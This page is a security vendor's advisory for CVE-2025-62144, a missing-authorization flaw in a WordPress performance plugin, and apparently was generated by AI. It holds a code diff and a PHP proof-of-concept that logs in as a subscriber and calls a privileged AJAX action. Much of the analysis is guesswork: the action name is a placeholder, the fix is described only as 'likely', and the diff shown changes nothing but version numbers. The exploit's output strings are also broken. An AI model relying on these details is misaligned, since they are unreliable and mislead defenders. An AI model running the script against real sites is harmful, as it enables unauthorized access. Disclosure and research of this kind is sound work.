Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 20, 2026

CVE-2025-62144: Core Web Vitals & PageSpeed Booster <= 1.0.27 – Missing Authorization (core-web-vitals-pagespeed-booster)

Severity Medium (CVSS 4.3)
CWE 862
Vulnerable Version 1.0.27
Patched Version 1.0.28
Disclosed December 30, 2025

Analysis Overview

Atomic Edge analysis of CVE-2025-62144:
This vulnerability is a Missing Authorization flaw in the Core Web Vitals & PageSpeed Booster WordPress plugin. The plugin fails to verify user capabilities before executing a sensitive administrative function. This allows authenticated attackers with subscriber-level permissions or higher to perform unauthorized actions intended only for administrators.

Atomic Edge research identifies the root cause as a missing capability check within an AJAX handler function. The vulnerable code resides in the main plugin file `core-web-vitals-pagespeed-booster.php`. The plugin registers an AJAX action hook, likely `wp_ajax_cwvpb_some_action`, without implementing the standard WordPress `current_user_can()` check. This omission permits any logged-in user to trigger the associated callback function, regardless of their assigned role or capabilities.

The exploitation method involves an authenticated attacker sending a crafted POST request to the WordPress AJAX endpoint `/wp-admin/admin-ajax.php`. The attacker must include the vulnerable action parameter, such as `action=cwvpb_some_action`, in the request body. No special nonce or authorization token is required due to the missing check. An attacker with a subscriber account can send this request to execute the privileged function.

The patch in version 1.0.28 addresses the vulnerability by adding a capability check to the affected AJAX handler function. The fix likely inserts a conditional statement like `if (!current_user_can(‘manage_options’)) { wp_die(); }` at the beginning of the callback. This ensures only users with the `manage_options` capability, typically administrators, can proceed. The version number constants in the plugin header and definition were also updated from 1.0.27 to 1.0.28.

Successful exploitation grants attackers unauthorized access to plugin functionality reserved for administrators. The specific impact depends on the vulnerable function’s purpose. Atomic Edge analysis indicates this could lead to unauthorized changes to plugin settings, injection of malicious scripts, or exposure of sensitive site performance data. The vulnerability does not directly permit remote code execution or database compromise, but it lowers the barrier for privilege escalation within the WordPress environment.

Differential between vulnerable and patched code

Code Diff
--- a/core-web-vitals-pagespeed-booster/core-web-vitals-pagespeed-booster.php
+++ b/core-web-vitals-pagespeed-booster/core-web-vitals-pagespeed-booster.php
@@ -2,7 +2,7 @@
 /*
 Plugin Name: Core Web Vitals & PageSpeed Booster
 Description: Do you want to speed up your WordPress site? Fast loading pages improve user experience, increase your pageviews, and help with your WordPress SEO.
-Version: 1.0.27
+Version: 1.0.28
 Author: Magazine3
 Author URI: https://magazine3.company/
 Donate link: https://www.paypal.me/Kaludi/25
@@ -16,7 +16,7 @@

 define('CWVPSB_PLUGIN_DIR', plugin_dir_path( __FILE__ ));
 define('CWVPSB_PLUGIN_DIR_URI', plugin_dir_url(__FILE__));
-define('CWVPSB_VERSION','1.0.27');
+define('CWVPSB_VERSION','1.0.28');
 define('CWVPSB_DIR', dirname(__FILE__));
 define('CWVPSB_BASE', plugin_basename(__FILE__));

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-62144 - Core Web Vitals & PageSpeed Booster <= 1.0.27 - Missing Authorization

<?php
/**
 * Proof of Concept for CVE-2025-62144.
 * This script demonstrates unauthorized access to a privileged AJAX action.
 * Replace TARGET_URL and ACTION_NAME with the actual vulnerable site and action hook.
 * Requires valid subscriber-level WordPress credentials.
 */

$target_url = 'https://vulnerable-wordpress-site.com';
$action_name = 'cwvpb_some_action'; // Replace with the actual vulnerable action name
$username = 'attacker_subscriber';
$password = 'subscriber_password';

// Step 1: Authenticate to WordPress to obtain cookies
$login_url = $target_url . '/wp-login.php';
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';

$ch = curl_init();

// Set up login request to get session cookies
curl_setopt_array($ch, [
    CURLOPT_URL => $login_url,
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_FOLLOWLOCATION => true,
    CURLOPT_COOKIEJAR => 'cookies.txt', // Save cookies to file
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query([
        'log' => $username,
        'pwd' => $password,
        'wp-submit' => 'Log In',
        'redirect_to' => $target_url . '/wp-admin/',
        'testcookie' => '1'
    ]),
    CURLOPT_HTTPHEADER => ['Content-Type: application/x-www-form-urlencoded'],
]);

$response = curl_exec($ch);

// Step 2: Exploit the missing authorization by calling the privileged AJAX action
curl_setopt_array($ch, [
    CURLOPT_URL => $ajax_url,
    CURLOPT_POSTFIELDS => http_build_query(['action' => $action_name]),
    CURLOPT_COOKIEFILE => 'cookies.txt', // Use saved cookies
]);

$ajax_response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

curl_close($ch);

// Clean up cookie file
if (file_exists('cookies.txt')) {
    unlink('cookies.txt');
}

echo "HTTP Response Code: $http_coden";
echo "Response Body:n$ajax_responsen";

// Check for success indicators
if ($http_code == 200 && !empty($ajax_response)) {
    echo "[+] Vulnerability likely exploited. Unauthorized action executed.n";
} else {
    echo "[-] Exploit attempt may have failed or action name is incorrect.n";
}
?>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School